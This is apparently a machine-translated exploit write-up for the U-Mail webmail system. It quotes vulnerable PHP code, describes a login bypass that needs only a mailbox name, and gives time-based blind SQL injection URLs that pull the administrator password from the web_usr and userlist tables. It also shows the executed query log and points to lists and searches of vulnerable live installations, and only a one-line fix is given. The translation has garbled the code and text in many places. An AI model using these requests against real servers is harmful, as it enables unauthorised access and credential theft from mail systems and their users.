An interface vulnerability in the U-Mail system (SQL injection is supported. Attackers can log on to the system and obtain the administrator password)
If there are so many email systems, getshell is a headache in minutes.
1. Email system Introduction
1) official: http://www.comingchina.com/html/downloads/
2) version: the latest version V9.8.57
3) test environment: Windows Server 2003 + IIS6.0 + official default Software
4) Case: http://www.comingchina.com/html/case/ OR Google "Powered by U-Mail"
Vulnerability code with more than 600 url download link: http://pan.baidu.com/s/1nQRzo password: ld5k
/Fast/oab/module/operates. php
If (ACTION = "save-to-pab") {include_once (LIB_PATH. "PAB. php "); $ PAB = PAB: getinstance (); $ maillist_id = trim ($ _ GET ['maillist']); if ($ maillist_id) {$ member_all = $ Maillist-> getMemberByMaillistID ($ maillist_id, "Mailbox, FullName", 0); if (! $ Member_all) {dump_json (array ("status" => TRUE, "message" => "");} foreach ($ member_all as $ member) {if (! $ PAB-> getContactByMail ($ user_id, $ member ['mailbox'], "contact_id", 0) {$ data = array ("user_id" => $ user_id, "fullname" => $ member ['fullname'], "pref_email" => $ member ['mailbox'], "updated" => date ("Y-m-d H: I: s"); $ res = $ PAB-> add_contact ($ data, 0); if (! $ Res) {dump_json (array ("status" => FALSE, "message" => "An error occurred while adding a contact. Adding failed! ") ;}}} Else {// do not submit maillist, enter $ user_ids = trim ($ _ GET ['userlist']); if (! $ User_ids) {dump_msg ("param_error", "parameter error! ") ;}$ Where =" t1.UserID IN (". $ user_ids. ")"; without single quotes, $ arr_tmp = $ Mailbox-> getMailboxInfo ($ domain_id, $ where, "", "", 0) is generated ); $ user_all = $ arr_tmp ['data']; if (! $ User_all) {dump_json (array ("status" => TRUE, "message" => ""));}
Function File
/Admin/lib/Mailbox. php code
Public function getMailboxInfo ($ _ obfuscate_AkPSczrCIu40, $ _ obfuscate_IRFhnYw? = "", $ _ Obfuscate_AedrEg ?? = "", $ _ Obfuscate_xvYeh9I? = "", $ _ Obfuscate_tUi30UB0e88? = "", $ _ Obfuscate_u5srL4rM3PZJLvpPhQ ?? = FALSE, $ _ obfuscate_ySeUHBw? = FALSE) {$ _ obfuscate_AkPSczrCIu40 = intval ($ _ obfuscate_AkPSczrCIu40); $ _ obfuscate_zbtFQY92OYenSG9u = "t1.DomainID = '". $ _ obfuscate_AkPSczrCIu40. "'AND t1.UserID> 2 AND t1.UserID = t2.UserID AND t2.is _ hidden = 0"; if ($ _ obfuscate_IRFhnYw?) {$ _ Obfuscate_zbtFQY92OYenSG9u. = "AND". $ _ obfuscate_IRFhnYw ?; // Directly concatenate the where statement and finally execute the SQL statement} if ($ _ obfuscate_xvYeh9I?) {If ($ _ obfuscate_AedrEg ??) {$ _ Obfuscate_mV9HBLY? = $ _ Obfuscate_AedrEg ?? * $ _ Obfuscate_xvYeh9I? -$ _ Obfuscate_xvYeh9I ?;} If ($ _ obfuscate_mV9HBLY?) {$ _ Obfuscate_UFlHiZJcJu6DQBFE = "LIMIT". $ _ obfuscate_mV9HBLY ?. ",". $ _ Obfuscate_xvYeh9I ?;} Else {$ _ obfuscate_UFlHiZJcJu6DQBFE = "LIMIT". $ _ obfuscate_xvYeh9I ?;}} If ($ _ obfuscate_tUi30UB0e88?) {$ _ Obfuscate_5e2O0TiivW7ec4c? = "Order by". $ _ obfuscate_tUi30UB0e88 ?; If ($ _ obfuscate_u5srL4rM3PZJLvpPhQ ??) {$ _ Obfuscate_5e2O0TiivW7ec4c?. = "DESC" ;}$ _ obfuscate_5e2O0TiivW7ec4c?. = ", T1.FullName ASC";} else {$ _ obfuscate_5e2O0TiivW7ec4c? = "Order by t1.OrderNo DESC, t1.Mailbox ASC"; }$ _ obfuscate_mGXfswsMZQ ?? = "SELECT t1.UserID, t1.Mailbox, t1.FullName, t1.EnglishName, t2. * \ r \ n \ t \ tFROM ". $ this-> get_table_name ("mailbox "). "as t1 ,". $ this-> get_table_name ("info "). "as t2 \ r \ n \ t \ tWHERE ". $ _ obfuscate_zbtFQY92OYenSG9u. "\ r \ n \ t ". $ _ obfuscate_5e2O0TiivW7ec4c ?; $ _ Obfuscate_YdwIclUMQ ?? =$ _ Obfuscate_mGXfswsMZQ ??. "". $ _ Obfuscate_UFlHiZJcJu6DQBFE; if ($ _ obfuscate_ySeUHBw?) {Dump ($ _ obfuscate_YdwIclUMQ ?? );} $ _ Obfuscate_MbMfEtWGUpEscGl = $ this-> db_count ($ _ obfuscate_mGXfswsMZQ ?? ); Unset ($ _ obfuscate_1LzzW8sGEkLaizk? ); $ _ Obfuscate_6RYLWQ ?? = $ This-> db_select ($ _ obfuscate_YdwIclUMQ ??, "More"); return array ("count" = >$ _ obfuscate_MbMfEtWGUpEscGl, "data" = >$ _ obfuscate_6RYLWQ ??);}
There is no need to log on because the mailbox system has a default user, and the file does not verify the user's password, as long as the user name is submitted, that is, the login is successful, and a series of operations can be performed. Run
Http://mail.fuck.com/webmail/fast/index.php? Module = operate & action = login post the following data to mailbox = [email protected] & link =?
The logon is successful. Although the page is not displayed, all functions can be executed.
Then execute,
Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = save-to-pab & userlist = if (ascii (substr (select password from userlist where FullName = 0x73167374656d), 1, 1) = 97, sleep (5), 1)
The executed SQL statement is
150121 20:11:25 2263 Connectumail@localhost on 2263 QuerySET NAMES 'UTF8' 2263 Init DBumail 2263 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
View response
Then, read the administrator password to operate on all users and emails. The management table is web_usr.
Single quotes cannot be introduced in exp. Therefore, the exp values of admin and administrator are
Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = save-to-pab & userlist = if (ascii (substr (select password from web_usr where role_code = 1), 1, 1) = 97, sleep (5), 1)
Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = save-to-pab & userlist = if (ascii (substr (select password from userlist where role_code = 2), 1, 1) = 97, sleep (5), 1)
Solution:
You can use your id_list_filter () function.